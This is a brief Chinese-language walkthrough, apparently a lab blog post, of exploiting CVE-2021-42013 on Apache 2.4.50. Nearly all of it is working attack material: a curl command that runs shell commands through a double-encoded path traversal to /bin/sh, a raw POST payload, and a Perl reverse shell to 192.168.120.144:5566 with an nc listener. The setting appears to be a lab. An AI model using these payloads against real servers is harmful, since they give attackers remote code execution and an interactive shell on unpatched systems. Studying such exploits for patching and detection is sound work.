CVE_2021_42013
1、查看中间件信息
有些时候直接从浏览器的检查就可以看到中间件信息:

可以看到,是Apache 2.4.50满足cve_2021_42013
2、测试
法一:shell测试
payload:
curl --data "echo;id" 'http://192.168.120.133:35846/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

法二:发包法
payload:
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

法三:反弹shell
payload:
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
echo;perl -e 'use Socket;$ip="192.168.120.144";$port=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($port,inet_aton($ip)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}'
kali监听:
nc -lvvp 5566

成功反弹!

浙公网安备 33010602011771号